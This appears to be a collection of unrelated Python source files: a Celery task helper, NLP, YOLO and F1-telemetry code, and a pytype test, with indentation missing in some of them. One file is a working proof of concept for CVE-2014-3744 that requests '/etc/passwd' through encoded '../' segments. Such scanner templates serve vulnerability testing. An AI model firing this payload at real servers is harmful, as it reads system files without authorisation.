@staticmethod
def _make_ttl_for_unique_task_record(task_options):
"""Given the options provided to `apply_async()` as keyword arguments, determines the appropriate
TTL to ensure that a unique task record in Redis expires (approximately) at the same time as the earliest
time that the task is expected to be executed by Celery.
The TTL value will be determined by examining the following values, in order of preference:
- The `eta` keyword argument passed to `apply_async()`, if any. If this value is found,
then the TTL will be the number of seconds between now and the ETA datetime.
- The `countdown` keyword argument passed to `apply_async()`, which will theoretically always
exist if `eta` was not provided. If this value is used, the TTL will be equal.
Additionally, if an `expires` keyword argument was passed, and its value represents (either as an integer
or timedelta) a shorter duration of time than the values provided by `eta` or `countdown`, the TTL will be
reduced to the value of `countdown`.
Finally, the TTL value returned by this method will always be greater than or equal to 1, in order to ensure
compatibility with Redis' TTL requirements, and that a record produced for a nonexistent task will only
live for a maximum of 1 second.
@param task_options: The values passed as additional keyword arguments to `apply_async()`
@type task_options: dict
@return: The TTL (in seconds) for the Redis record to-be-created
@rtype: int
"""
# Set a default TTL as 1 second (in case actual TTL already occurred)
ttl_seconds = 1
option_keys = task_options.keys()
if 'eta' in option_keys:
# Get the difference between the ETA and now (relative to the ETA's timezone)
ttl_seconds = int(
(task_options['eta'] - datetime.datetime.now(tz=task_options['eta'].tzinfo)).total_seconds()
)
elif 'countdown' in option_keys:
ttl_seconds = task_options['countdown']
if 'expires' in option_keys:
if isinstance(task_options['expires'], datetime.datetime):
# Get the difference between the countdown and now (relative to the countdown's timezone)
seconds_until_expiry = int(
(task_options['expires'] - datetime.datetime.now(tz=task_options['expires'].tzinfo)).total_seconds()
)
else:
seconds_until_expiry = task_options['expires']
if seconds_until_expiry < ttl_seconds:
ttl_seconds = seconds_until_expiry
if ttl_seconds <= 0:
ttl_seconds = 1
return ttl_seconds
def unique_task_factory(task_cls):
    """Mix unique-task handling into a Celery task base class.

    @param task_cls: The original Celery task base class to combine with
        `UniqueTaskMixin`.
    @type task_cls: type
    @return: A new abstract task base class with unique-task behavior mixed in.
    @rtype: type
    """
    bases = (UniqueTaskMixin, task_cls)
    # str() keeps the class name a native str on both Python 2 and 3.
    return type(str('UniqueTask'), bases, {})
|
python
|
from . import hist, quality
|
python
|
import requests
# Vuln Base Info
def info():
    """Return the static vulnerability metadata for CVE-2014-3744 (Node.js `st` traversal)."""
    classification = {
        "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "cvss-score": "7.5",
        "cve-id": "CVE-2014-3744",
        "cwe-id": "CWE-22",
    }
    references = [
        "https://nvd.nist.gov/vuln/detail/CVE-2014-3744",
        "https://github.com/advisories/GHSA-69rr-wvh9-6c4q",
        "https://snyk.io/vuln/npm:st:20140206",
    ]
    return {
        "author": "cckuailong",
        "name": '''Node.js st module Directory Traversal''',
        "description": '''A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.''',
        "severity": "high",
        "references": references,
        "classification": classification,
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2014", "lfi", "nodejs", "st"],
    }
# Vender Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook; this PoC has no reliable banner check, so every target passes."""
    return True
# Proof of Concept
def poc(url):
    """Probe `url` for CVE-2014-3744 by requesting /etc/passwd via encoded `..` segments.

    Returns a dict with a "success" bool and, on success, the vuln "info" and
    the exact "payload" URL that triggered the read.
    """
    result = {}
    try:
        url = format_url(url)
        path = '/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path
        else:
            # Explicitly record the miss so callers always find a "success" key
            # (the original left the dict empty for non-vulnerable targets).
            result["success"] = False
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit still propagate.
        result["success"] = False
    return result
# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to the PoC (the traversal read *is* the exploit)."""
    return poc(url)
# Utils
def format_url(url):
    """Normalize a target URL: trim whitespace, ensure an http(s) scheme, drop trailing slashes."""
    cleaned = url.strip()
    if not cleaned.startswith(('http://', 'https://')):
        cleaned = 'http://' + cleaned
    return cleaned.rstrip('/')
|
python
|
__copyright__ = "Copyright 2015 Contributing Entities"
__license__ = """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .Assignment import Assignment
from .Error import Error, ConfigurationError
from .FastTrips import FastTrips
from .Logger import FastTripsLogger, setupLogging
from .Passenger import Passenger
from .PathSet import PathSet
from .Performance import Performance
from .Route import Route
from .Run import run_fasttrips, main
from .Stop import Stop
from .TAZ import TAZ
from .Transfer import Transfer
from .Trip import Trip
from .Util import Util
# Public API, kept in sync with the imports above. The previous list named
# 'Event' and 'Run', which are never imported here (so `from fasttrips import *`
# raised AttributeError), and omitted several names that *are* imported.
__all__ = [
    'Assignment',
    'Error', 'ConfigurationError',
    'FastTrips',
    'FastTripsLogger', 'setupLogging',
    'Passenger',
    'PathSet',
    'Performance',
    'Route',
    'run_fasttrips', 'main',
    'Stop',
    'TAZ',
    'Transfer',
    'Trip',
    'Util',
]
|
python
|
import spacy
nlp = spacy.load('en_core_web_sm')
from spacy.matcher import Matcher, PhraseMatcher
from spacy.tokens import Span
import string
from nltk.corpus import stopwords
import pandas as pd
def phrase_template():
    '''
    This function returns a list of all the possible technical terms that has high possibility of having several occurances in FAA handbooks and manuals,
    or in manuals pertaining to aircraft procedures and emergency procedures.
    This list is required to use the Phrase Matcher algoritm of matching the relations.
    '''
    # NOTE(review): the list intentionally mirrors the handbook vocabulary verbatim;
    # it contains duplicates (e.g. "attitude", "stall", "door") and one entry with a
    # leading space (" Federal Aviation Administration") — confirm whether those are
    # deliberate before changing them, since they are fed directly to PhraseMatcher.
    phrases = ["emergency", "non-normal", " Federal Aviation Administration", "FAA", "Handbook", "emergency landings",
               "engine", "emergency landing", "forced landing", "precautionary landing", "ditching", "fire",
               "sink rate", "sink rate control", "attitude", "terrain selection", "safety concepts", "configuration",
               "approach", "terrain types", "terrain", "confined areas", "trees", "forest", "water", "snow", "after takeoff",
               "engine failure after takeoff", "single engine", "single-engine", "emergency descents", "in-flight", "in-flight fire",
               "engine fire", "electrical fire", "electrical fires", "cabin fire", "asymmetric", "split", "asymmetric flap", "asymmetric (split) flap", "flap", "flaps",
               "malfunction", "flight control malfunction", "flight control malfunctions", "flight control", "total flap failure", "total flaps failure",
               "loss", "loss of elevator control", "elevator", "elevator control", "gear", "landing gear", "landing gear malfunction", "gears", "systems malfunction", "systems malfunctions",
               "electrical", "electrical system", "pitot", "pitot-static", "pitot tube", "blocked", "blockage", "pitot-static system", "instrument operation", "pressure", "pressure chamber",
               "stall", "speed", "vertical speed", "door", "door opening in-flight", "door opeining", "loss", "loss of rpm", "rpm", "loss of manifold pressure", "gain of manifold pressure", "high oil temperature",
               "Inadvertent VFR Flight into IMC", "VFR Flight", "VFR", "control", "maintaining", "airplane control", "maintaining airplane control",
               "attitude", "attitude indicator", "attitude control", "turns", "spiral", "graveyard spiral", "instabaility", "steep", "banks", "steep banks", "climbs", "descents", "maneuvers", "visual flight",
               "extend", "retract", "extension", "retraction", "non-instrument-rated", "pilot", "psychological hazards", "nose", "flying speed", "landing area", "throttle", "runway", "minimum", "touchdown", "glide",
               "damage", "groundspeed", "wind", "deceleration", "hydraulics", "hydraulic", "door", "opening", "spiral", "descent", "EFIS", "avionics", "IFR", "propellor", "thrust", "oil temperature", "oil pressure", "fuel pressure",
               "displays", "flight display", "cowl", "stall", "stall warning", "stall warning horn", "engines", "fuel", "fuel leak", "fuel shortage", "fuel tank", "fuel supply", "fuel selector", ]
    return phrases
def entity_pair(sent):
    '''
    The subject and the object is extracted from the sentence passed into the function.

    Bug fix: the original tested `token.dep_.find("subj") == True`, which compares
    a substring *index* against True (i.e. 1). That only matched dependency tags
    where "subj"/"obj" happens to start at index 1 (e.g. "nsubj", "dobj") and
    missed tags like "subj"/"obj" themselves. Substring containment is what was
    intended, so `in` is used instead.

    Returns [subject, object] with any compound/modifier prefixes attached.
    '''
    ent1 = ""
    ent2 = ""
    prev_token_dep = ""   # dependency tag of the previous token
    prev_token_text = ""  # text of the previous token
    prefix = ""
    modifier = ""
    for token in nlp(sent):
        if token.dep_ != "punct":
            if token.dep_ == "compound":
                prefix = token.text
                # Chain consecutive compounds into one prefix.
                if prev_token_dep == "compound":
                    prefix = prev_token_text + " " + token.text
            # endswith() already returns a bool; the `== True` was redundant.
            if token.dep_.endswith("mod"):
                modifier = token.text
                if prev_token_dep == "compound":
                    modifier = prev_token_text + " " + token.text
            if "subj" in token.dep_:
                ent1 = modifier + " " + prefix + " " + token.text
                prefix = ""
                modifier = ""
                prev_token_dep = ""
                prev_token_text = ""
            if "obj" in token.dep_:
                ent2 = modifier + " " + prefix + " " + token.text
            prev_token_dep = token.dep_
            prev_token_text = token.text
    return [ent1.strip(), ent2.strip()]
def get_relation(sent):
    '''
    Relations are identified and matched in each sentence.

    Returns the text of the *last* phrase-template match in the sentence, or the
    whole sentence when nothing matches (same behavior as the original loop,
    which overwrote `span` on every match). The unused `k` local was removed.
    '''
    doc = nlp(sent)
    matcher = PhraseMatcher(nlp.vocab)
    pattern = list(nlp.tokenizer.pipe(phrase_template()))
    # NOTE(review): the 3-argument `add` is the spaCy v2 API; spaCy v3 expects
    # matcher.add("matching_1", pattern) — confirm the installed version.
    matcher.add("matching_1", None, *pattern)
    matches = matcher(doc)
    span = doc
    if matches:
        _, start, end = matches[-1]
        span = doc[start:end]
    return(span.text)
def cleanup_text(docs, logging=False):
    '''
    The text loaded from the PDF is cleaned and lemmatized. Entities such as Punctuations, stop words, pronouns etc are removed.

    Returns a pandas Series with one cleaned string per input document.
    '''
    texts = []
    counter = 1
    # Hoisted out of the loop: stopwords.words() rebuilds the full stopword list
    # on every call, which made the original per-token membership test O(corpus).
    # A set also turns each lookup into O(1).
    stop_words = set(stopwords.words('english'))
    for doc in docs:
        if counter % 1000 == 0 and logging:
            print("Processed %d out of %d documents." % (counter, len(docs)))
        counter += 1
        # NOTE(review): passing `disable` to nlp(...) is the spaCy v2 calling
        # convention — confirm against the installed spaCy version.
        doc = nlp(doc, disable=['parser', 'ner'])
        tokens = [tok.lemma_.lower().strip() for tok in doc if tok.lemma_ != '-PRON-']
        tokens = [tok for tok in tokens if tok not in stop_words and tok not in string.punctuation]
        tokens = ' '.join(tokens)
        texts.append(tokens)
    return pd.Series(texts)
|
python
|
# Import the agent class
#from .agenttemplate import AgentTemplate
|
python
|
# Copyright © 2020 Arm Ltd and Contributors. All rights reserved.
# SPDX-License-Identifier: MIT
"""
Contains functions specific to decoding and processing inference results for YOLO V3 Tiny models.
"""
import cv2
import numpy as np
def iou(box1: list, box2: list):
    """
    Calculates the intersection-over-union (IoU) value for two bounding boxes.

    Args:
        box1: Positions of the first box as [x_min, y_min, x_max, y_max].
        box2: Positions of the second box in the same form.

    Returns:
        The IoU of the two boxes; 0 when either box is degenerate.
    """
    area1 = (box1[2] - box1[0]) * (box1[3] - box1[1])
    area2 = (box2[2] - box2[0]) * (box2[3] - box2[1])
    # A box with non-positive area cannot overlap anything.
    if area1 <= 0 or area2 <= 0:
        return 0
    overlap_w = min(box1[2], box2[2]) - max(box1[0], box2[0])
    overlap_h = min(box1[3], box2[3]) - max(box1[1], box2[1])
    intersection = max(0, overlap_h) * max(0, overlap_w)
    union = area1 + area2 - intersection
    # union > 0 is guaranteed here since both areas are positive; the ternary
    # mirrors the original's ZeroDivisionError guard.
    return intersection / union if union else 0
def yolo_processing(output: np.ndarray, confidence_threshold=0.40, iou_threshold=0.40):
    """
    Performs non-maximum suppression on input detections. Any detections
    with IOU value greater than given threshold are suppressed.

    Args:
        output: Vector of outputs from network.
        confidence_threshold: Selects only strong detections above this value.
        iou_threshold: Filters out boxes with IOU values above this value.

    Returns:
        A list of detected objects in the form [class, [box positions], confidence]
    """
    if len(output) != 1:
        raise RuntimeError('Number of outputs from YOLO model does not equal 1')
    # Indices of detections whose objectness score clears the threshold.
    scores = output[0][:, :, 4][0]
    candidate_ids = list(np.where(scores > confidence_threshold)[0])
    remaining = []
    for det_id in candidate_ids:
        box = list(output[0][:, det_id, :4][0])
        confidence = output[0][:, det_id, 4][0]
        class_idx = np.argmax(output[0][:, det_id, 5:])
        remaining.append((class_idx, box, confidence))
    # Greedy NMS: repeatedly keep the most confident detection and drop
    # everything that overlaps it too strongly.
    kept = []
    while remaining:
        best = int(np.argmax([det[2] for det in remaining]))
        kept.append(remaining.pop(best))
        best_box = kept[-1][1]
        remaining = [det for det in remaining if iou(det[1], best_box) <= iou_threshold]
    return kept
def yolo_resize_factor(video: cv2.VideoCapture, input_binding_info: tuple):
    """
    Gets a multiplier to scale the bounding box positions to
    their correct position in the frame.

    Args:
        video: Video capture object, contains information about data source.
        input_binding_info: Contains shape of model input layer.

    Returns:
        Resizing factor to scale box coordinates to output frame size.
    """
    frame_height = video.get(cv2.CAP_PROP_FRAME_HEIGHT)
    frame_width = video.get(cv2.CAP_PROP_FRAME_WIDTH)
    # Indices 1-2 of the model input shape are treated as (height, width);
    # presumably an NHWC layout — confirm against the model's binding info.
    model_height, model_width = list(input_binding_info[1].GetShape())[1:3]
    # Ratio of the dominant frame dimension to the dominant model dimension.
    return max(frame_height, frame_width) / max(model_height, model_width)
|
python
|
from xml.etree.ElementTree import tostring
from f1_telemetry.server import get_telemetry
from kusto.ingest import ingest_kusto
from datetime import datetime
# Batch sizes for Kusto ingestion: high-frequency streams (telemetry, laps,
# car status) flush after batch_freq_high packets; low-frequency streams
# (session) flush after batch_freq_low packets.
batch_freq_high = 9 # 20 cars per packet * batch_freq_high(x) packets
batch_freq_low = 2
# Per-stream packet counters and CSV row buffers, mutated by the ingest_* functions.
ingest_cartelemetrydataCnt = 0
ingest_cartelemetryBuffer = ""
ingest_sessiondataCnt = 0
ingest_sessiondataBuffer = ""
ingest_lapdataCnt = 0
ingest_lapdataBuffer = ""
ingest_carstatusdataCnt = 0
ingest_carstatusdataBuffer = ""
def ingest_cartelemetrydata(packet, m_header):
    """Buffer one CSV row per car from a telemetry packet; flush to Kusto every
    `batch_freq_high` packets."""
    #print ("car telemetry length..", len(packet.m_carTelemetryData))
    global ingest_cartelemetryBuffer
    global ingest_cartelemetrydataCnt
    #print ("SUID ", m_header.m_sessionUID)
    for idx,cartelemetrydata in enumerate(packet.m_carTelemetryData):
        # Column order must match the CarTelemetry table schema in Kusto.
        data = [
            datetime.utcnow(),
            m_header.m_sessionUID,
            m_header.m_frameIdentifier,
            m_header.m_sessionTime,
            m_header.m_playerCarIndex,
            idx,
            cartelemetrydata.m_speed,
            cartelemetrydata.m_throttle,
            cartelemetrydata.m_steer,
            cartelemetrydata.m_brake,
            cartelemetrydata.m_clutch,
            cartelemetrydata.m_gear,
            cartelemetrydata.m_engineRPM,
            cartelemetrydata.m_drs,
            cartelemetrydata.m_revLightsPercent,
            '', #cartelemetrydata.m_brakesTemperature fix parse issue
            cartelemetrydata.m_tyresSurfaceTemperature[0],
            cartelemetrydata.m_tyresSurfaceTemperature[1],
            cartelemetrydata.m_tyresSurfaceTemperature[2],
            cartelemetrydata.m_tyresSurfaceTemperature[3],
            cartelemetrydata.m_tyresInnerTemperature[0],
            cartelemetrydata.m_tyresInnerTemperature[1],
            cartelemetrydata.m_tyresInnerTemperature[2],
            cartelemetrydata.m_tyresInnerTemperature[3],
            cartelemetrydata.m_engineTemperature,
            cartelemetrydata.m_tyresPressure[0],
            cartelemetrydata.m_tyresPressure[1],
            cartelemetrydata.m_tyresPressure[2],
            cartelemetrydata.m_tyresPressure[3],
            cartelemetrydata.m_surfaceType[0],
            cartelemetrydata.m_surfaceType[1],
            cartelemetrydata.m_surfaceType[2],
            cartelemetrydata.m_surfaceType[3]
        ]
        ingest_cartelemetryBuffer += ','.join(map(str, data))
        ingest_cartelemetryBuffer +="\n"
    # The counter advances once per packet (not per car), so a flush carries
    # roughly 20 cars * batch_freq_high packets worth of rows.
    if ingest_cartelemetrydataCnt == batch_freq_high:
        #print(ingest_cartelemetryBuffer)
        ingest_kusto("CarTelemetry", ingest_cartelemetryBuffer )
        ingest_cartelemetryBuffer=""
        ingest_cartelemetrydataCnt=0
    else:
        ingest_cartelemetrydataCnt+=1
def ingest_sessiondata(sessiondatapacket, m_header):
    """Buffer one CSV row per session packet; flush to Kusto every `batch_freq_low` packets.

    Bug fix: the buffer was overwritten with `=` instead of appended with `+=`
    (unlike every other ingest_* function), so all but the most recent row in a
    batch were silently dropped.
    """
    global ingest_sessiondataBuffer
    global ingest_sessiondataCnt
    # Column order must match the Session table schema in Kusto.
    data = [
        datetime.utcnow(),
        m_header.m_sessionUID,
        m_header.m_frameIdentifier,
        m_header.m_sessionTime,
        m_header.m_playerCarIndex,
        sessiondatapacket.m_weather,
        sessiondatapacket.m_trackTemperature,
        sessiondatapacket.m_airTemperature,
        sessiondatapacket.m_totalLaps,
        sessiondatapacket.m_trackId,
        sessiondatapacket.m_trackLength,
        sessiondatapacket.m_sessionType,
        sessiondatapacket.m_sessionDuration,
        sessiondatapacket.m_sessionTimeLeft
    ]
    # Append (do not overwrite) so earlier buffered rows survive until the flush.
    ingest_sessiondataBuffer += ','.join(map(str, data))
    ingest_sessiondataBuffer += "\n"
    if ingest_sessiondataCnt == batch_freq_low:
        ingest_kusto("Session", ingest_sessiondataBuffer)
        # print(ingest_sessiondataBuffer)
        ingest_sessiondataBuffer = ""
        ingest_sessiondataCnt = 0
    else:
        ingest_sessiondataCnt += 1
def ingest_participantdata(packet, m_header):
    """Ingest one CSV row per participant immediately (no batching, unlike the
    high-frequency telemetry feeds)."""
    buffered_rows = ""
    for car_index, participant in enumerate(packet.m_participants):
        # Column order must match the Participant table schema in Kusto.
        row = [
            datetime.utcnow(),
            m_header.m_sessionUID,
            m_header.m_frameIdentifier,
            m_header.m_sessionTime,
            m_header.m_playerCarIndex,
            car_index,
            packet.m_numActiveCars,
            participant.m_aiControlled,
            participant.m_driverId,
            participant.m_teamId,
            participant.m_raceNumber,
            participant.m_nationality,
            participant.m_name.decode()
        ]
        buffered_rows += ','.join(map(str, row)) + "\n"
    #print(participantdataBuffer)
    ingest_kusto("Participant", buffered_rows)
def ingest_lapdata(packet, m_header):
    """Buffer one CSV row per car from a lap-data packet; flush to Kusto every
    `batch_freq_high` packets."""
    global ingest_lapdataBuffer
    global ingest_lapdataCnt
    for idx,lapdata in enumerate(packet.m_lapsData):
        # Column order must match the Lap table schema in Kusto.
        data = [
            datetime.utcnow(),
            m_header.m_sessionUID,
            m_header.m_frameIdentifier,
            m_header.m_sessionTime,
            m_header.m_playerCarIndex,
            idx,
            lapdata.m_lastLapTime,
            lapdata.m_currentLapTime,
            lapdata.m_bestLapTime,
            lapdata.m_carPosition,
            lapdata.m_currentLapNum,
            lapdata.m_currentLapInvalid,
            lapdata.m_lapDistance,
            lapdata.m_totalDistance,
            lapdata.m_gridPosition,
            lapdata.m_pitStatus,
            lapdata.m_penalties,
            lapdata.m_driverStatus,
            lapdata.m_resultStatus
        ]
        ingest_lapdataBuffer += ','.join(map(str, data))
        ingest_lapdataBuffer +="\n"
    # Counter advances once per packet; each flush carries several packets of rows.
    if ingest_lapdataCnt == batch_freq_high:
        #print(ingest_lapdataBuffer)
        ingest_kusto("Lap", ingest_lapdataBuffer )
        ingest_lapdataBuffer=""
        ingest_lapdataCnt=0
    else:
        ingest_lapdataCnt+=1
def ingest_carstatusdata(packet, m_header):
    """Buffer one CSV row per car from a car-status packet; flush to Kusto every
    `batch_freq_high` packets."""
    global ingest_carstatusdataBuffer
    global ingest_carstatusdataCnt
    for idx,carstatusdata in enumerate(packet.m_carStatusData):
        # Column order must match the CarStatus table schema in Kusto.
        data = [
            datetime.utcnow(),
            m_header.m_sessionUID,
            m_header.m_frameIdentifier,
            m_header.m_sessionTime,
            m_header.m_playerCarIndex,
            idx,
            carstatusdata.m_tractionControl,
            carstatusdata.m_antiLockBrakes,
            carstatusdata.m_fuelMix,
            carstatusdata.m_fuelInTank,
            carstatusdata.m_fuelCapacity,
            carstatusdata.m_fuelRemainingLaps,
            carstatusdata.m_maxRPM,
            carstatusdata.m_idleRPM,
            carstatusdata.m_maxGears,
            carstatusdata.m_drsAllowed,
            carstatusdata.m_tyresWear[0],
            carstatusdata.m_tyresWear[1],
            carstatusdata.m_tyresWear[2],
            carstatusdata.m_tyresWear[3],
            carstatusdata.m_actualTyreCompound,
            carstatusdata.m_tyreVisualCompound,
            carstatusdata.m_tyresDamage[0],
            carstatusdata.m_tyresDamage[1],
            carstatusdata.m_tyresDamage[2],
            carstatusdata.m_tyresDamage[3],
            carstatusdata.m_frontLeftWingDamage,
            carstatusdata.m_frontRightWingDamage,
            carstatusdata.m_rearWingDamage,
            carstatusdata.m_engineDamage,
            carstatusdata.m_gearBoxDamage,
            carstatusdata.m_vehicleFiaFlags
        ]
        ingest_carstatusdataBuffer += ','.join(map(str, data))
        ingest_carstatusdataBuffer +="\n"
    # Counter advances once per packet; each flush carries several packets of rows.
    if ingest_carstatusdataCnt == batch_freq_high:
        #print(ingest_carstatusdataBuffer)
        ingest_kusto("CarStatus", ingest_carstatusdataBuffer )
        ingest_carstatusdataBuffer=""
        ingest_carstatusdataCnt=0
    else:
        ingest_carstatusdataCnt+=1
if __name__ == '__main__':
    print("Server started on 20777")
    # Dispatch each UDP telemetry packet by its packet-type id (theader).
    for packet, theader, m_header, player in get_telemetry():
        #print(theader, packet)
        if theader == 0: #PacketMotionData
            # Motion data is currently ignored; the string below is retained
            # as a placeholder/example of the available fields.
            """ print(theader, packet.m_wheelSpeed[0], packet.m_wheelSpeed[1],
            packet.m_wheelSpeed[2], packet.m_wheelSpeed[3])
            """
        elif theader == 1: #PacketSessionData
            ingest_sessiondata(packet, m_header)
        elif theader == 2: # lap data
            ingest_lapdata(packet, m_header)
        elif theader == 3: # event packet — only logged, not ingested
            print(dir(packet.m_eventStringCode))
            print(theader, "Event ID: ", packet.m_eventStringCode._type_)
        elif theader == 4: # participants
            #print("ID: ", theader)
            ingest_participantdata(packet,m_header)
        elif theader == 5: # car setups — ignored; placeholder kept for reference
            """ for setupdata in packet.m_carSetups:
            print(theader, "Front Wing: ", setupdata.m_frontWing,
            "Rear Wing: ", setupdata.m_rearWing,
            "Differential on throttle: ", setupdata.m_onThrottle,
            "Differential off throttle: ", setupdata.m_offThrottle,
            "Front camber: ", setupdata.m_frontCamber,
            "Rear camber: ", setupdata.m_rearCamber,
            "Front toe: ", setupdata.m_frontToe,
            "Rear toe: ", setupdata.m_rearToe,
            "Front suspension: ", setupdata.m_frontSuspension,
            "Rear suspension: ", setupdata.m_rearSuspension,
            "Front bar: ", setupdata.m_frontAntiRollBar,
            "Rear bar: ", setupdata.m_rearAntiRollBar,
            "Front height: ", setupdata.m_frontSuspensionHeight,
            "Rear height: ", setupdata.m_rearSuspensionHeight,
            "Brake pressure (%): ", setupdata.m_brakePressure,
            "Brake bias (%): ", setupdata.m_brakeBias,
            "Front tyre (PSI): ", setupdata.m_frontTyrePressure,
            "Rear tyre (PSI): ", setupdata.m_rearTyrePressure,
            "Ballast: ", setupdata.m_ballast,
            "Fuel Load: ", setupdata.m_fuelLoad)
            """
        elif theader == 6: # car telemetry
            ingest_cartelemetrydata(packet, m_header)
        elif theader == 7: # car status
            ingest_carstatusdata(packet, m_header)
|
python
|
"""Integration test for pytype."""
from __future__ import print_function
import csv
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
import textwrap
from pytype import config
from pytype import main as main_module
from pytype import utils
from pytype.pyi import parser
from pytype.pytd import pytd_utils
from pytype.pytd import typeshed
from pytype.pytd.parse import builtins
from pytype.tests import test_base
import unittest
class PytypeTest(unittest.TestCase):
"""Integration test for pytype."""
PYTHON_VERSION = (2, 7)
DEFAULT_PYI = builtins.DEFAULT_SRC
INCLUDE = object()
@classmethod
def setUpClass(cls):
    """Locate the pytype package root once for the whole test class."""
    super(PytypeTest, cls).setUpClass()
    # parser.__file__ lives two directory levels below the pytype root.
    cls.pytype_dir = os.path.dirname(os.path.dirname(parser.__file__))
def setUp(self):
    """Create a fresh temp dir and default pytype arguments for each test."""
    super(PytypeTest, self).setUp()
    self._ResetPytypeArgs()
    self.tmp_dir = tempfile.mkdtemp()
    # Most tests direct error output here and inspect it via assertHasErrors().
    self.errors_csv = os.path.join(self.tmp_dir, "errors.csv")
def tearDown(self):
    """Remove the per-test temporary directory."""
    super(PytypeTest, self).tearDown()
    shutil.rmtree(self.tmp_dir)
def _ResetPytypeArgs(self):
    """Reset the command-line arg dict to just the python version and verbosity."""
    self.pytype_args = {
        "--python_version": utils.format_version(self.PYTHON_VERSION),
        "--verbosity": 1
    }
def _DataPath(self, filename):
if os.path.dirname(filename) == self.tmp_dir:
return filename
return os.path.join(self.pytype_dir, "test_data/", filename)
def _TmpPath(self, filename):
    """Return the path of `filename` inside this test's temp directory."""
    return os.path.join(self.tmp_dir, filename)
def _MakePyFile(self, contents):
    """Write `contents` to a temp .py file, adding the annotations import if needed."""
    if utils.USE_ANNOTATIONS_BACKPORT:
        contents = test_base.WithAnnotationsImport(contents)
    return self._MakeFile(contents, extension=".py")
def _MakeFile(self, contents, extension):
contents = textwrap.dedent(contents)
path = self._TmpPath(
hashlib.md5(contents.encode("utf-8")).hexdigest() + extension)
with open(path, "w") as f:
print(contents, file=f)
return path
def _RunPytype(self, pytype_args_dict):
    """A single command-line call to the pytype binary.

    Typically you'll want to use _CheckTypesAndErrors or
    _InferTypesAndCheckErrors, which will set up the command-line arguments
    properly and check that the errors file is in the right state after the
    call. (The errors check is bundled in to avoid the user forgetting to call
    assertHasErrors() with no arguments when expecting no errors.)

    Args:
      pytype_args_dict: A dictionary of the arguments to pass to pytype, minus
        the binary name. For example, to run
          pytype simple.py --output=-
        the arguments should be {"simple.py": self.INCLUDE, "--output": "-"}

    Side effects: sets self.stdout, self.stderr and self.returncode.
    """
    pytype_exe = os.path.join(self.pytype_dir, "pytype")
    pytype_args = [pytype_exe]
    for arg, value in pytype_args_dict.items():
        # Regular options become --flag=value; INCLUDE-valued keys are passed bare.
        if value is not self.INCLUDE:
            arg += "=" + str(value)
        pytype_args.append(arg)
    p = subprocess.Popen(
        pytype_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    self.stdout, self.stderr = (s.decode("utf-8") for s in p.communicate())
    self.returncode = p.returncode
def _ParseString(self, string):
    """A wrapper for parser.parse_string that inserts the python version.

    Returns the parsed pyi AST for `string`.
    """
    return parser.parse_string(string, python_version=self.PYTHON_VERSION)
def _GenerateBuiltinsTwice(self, python_version):
    """Run --generate-builtins twice for `python_version`; return both pickle paths."""
    # Fix the hash seed so the two runs are bit-for-bit comparable.
    os.environ["PYTHONHASHSEED"] = "0"
    f1 = self._TmpPath("builtins1.pickle")
    f2 = self._TmpPath("builtins2.pickle")
    for f in (f1, f2):
        self.pytype_args["--generate-builtins"] = f
        self.pytype_args["--python_version"] = python_version
        self._RunPytype(self.pytype_args)
    return f1, f2
def assertBuiltinsPickleEqual(self, f1, f2):
    """Assert two builtins pickles are identical, diffing their ASTs on mismatch."""
    with open(f1, "rb") as pickle1, open(f2, "rb") as pickle2:
        if pickle1.read() == pickle2.read():
            return
    # Byte-level mismatch: load both pickles and report a structural diff.
    out1 = pytd_utils.LoadPickle(f1, compress=True)
    out2 = pytd_utils.LoadPickle(f2, compress=True)
    raise AssertionError("\n".join(pytd_utils.DiffNamedPickles(out1, out2)))
def assertOutputStateMatches(self, **has_output):
    """Check that the output state matches expectations.

    If, for example, you expect the program to print something to stdout and
    nothing to stderr before exiting with an error code, you would write
    assertOutputStateMatches(stdout=True, stderr=False, returncode=True).

    Args:
      **has_output: Whether each output type should have output.
    """
    output_types = {"stdout", "stderr", "returncode"}
    # All three keys must be supplied explicitly by the caller.
    assert len(output_types) == len(has_output)
    for output_type in output_types:
        output_value = getattr(self, output_type)
        if has_output[output_type]:
            self.assertTrue(output_value, output_type + " unexpectedly empty")
        else:
            # Truncate long unexpected output in the failure message.
            value = str(output_value)
            if len(value) > 50:
                value = value[:47] + "..."
            self.assertFalse(
                output_value, "Unexpected output to %s: %r" % (output_type, value))
def assertHasErrors(self, *expected_errors):
    """Assert the errors CSV contains exactly `expected_errors` (by error name, in order)."""
    with open(self.errors_csv, "r") as f:
        errors = list(csv.reader(f, delimiter=","))
    num, expected_num = len(errors), len(expected_errors)
    try:
        self.assertEqual(num, expected_num,
            "Expected %d errors, got %d" % (expected_num, num))
        for error, expected_error in zip(errors, expected_errors):
            # Column 2 of each CSV row holds the error name.
            self.assertEqual(expected_error, error[2],
                "Expected %r, got %r" % (expected_error, error[2]))
    except:
        # Dump the full error table to stderr before re-raising the failure.
        print("\n".join(" | ".join(error) for error in errors), file=sys.stderr)
        raise
def _SetUpChecking(self, filename):
self.pytype_args[self._DataPath(filename)] = self.INCLUDE
self.pytype_args["--check"] = self.INCLUDE
def _CheckTypesAndErrors(self, filename, expected_errors):
    """Run pytype --check on `filename` and verify it emits exactly `expected_errors`."""
    self._SetUpChecking(filename)
    self.pytype_args["--output-errors-csv"] = self.errors_csv
    self._RunPytype(self.pytype_args)
    # Errors go to the CSV, so all process outputs should be empty/zero.
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
